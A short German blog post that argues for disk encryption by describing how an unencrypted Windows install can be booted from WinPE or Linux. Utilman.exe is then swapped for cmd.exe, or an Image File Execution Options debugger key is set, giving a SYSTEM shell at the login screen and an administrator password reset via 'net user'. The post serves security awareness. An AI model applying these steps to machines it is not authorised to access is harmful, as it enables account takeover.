Das nachfolgende Szenario ist schon länger bekannt, jedoch möchte ich damit wieder einmal darauf hinweisen, wie wichtig es ist eine Festplatten Verschlüsselung einzusetzen.
Wenn eine Windows Installation unverschlüsselt ist, kann relativ einfach eine Shell mit den höchsten Rechten (NT AUTHORITY\System) gestartet werden. Damit lässt sich absolut alles mit einem System machen, wie z.B das Passwort des lokalen Adminstrators ändern um sich damit anzumelden.
Um diese Shell zu starten bedienen wir uns dem Windows Feature Eingabehilfen auf dem Login Bildschirm, welches immer als NT AUTHORITY\System Benutzer gestartet wird.
Es gibt verschiedene Varianten an diese Shell zu gelangen:
Variante 1: Programm kopieren (einfachere)
- Zielsystem mit WinPE oder Linux (mit NTFS Lese/Schreibberechtigungen) starten
- C:\Windows\System32\Utilman.exe nach Utilman.exe.bak umbenennen
- C:\Windows\System32\cmd.exe kopieren nach C:\Windows\System32\Utilman.exe
- Neustarten und die Eingabehilfen starten
- net user administrator
Variante 2: Image File Exection Options (komplexere)
- Zielsystem mit WinPE oder Linux (mit NTFS Lese/Schreibberechtigungen) starten
- Registry Hive C:\Windows\System32\config\SOFTWARE laden
- Zum Schlüssel (vom Zielsystem) wechseln KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
- Neuen Schlüssel erstellen mit Namen utilman.exe
- In diesem Schlüssel einen String Value erstellen Name = debugger Value = cmd.exe
- Neustarten und die Eingabehilfen starten
- net user administrator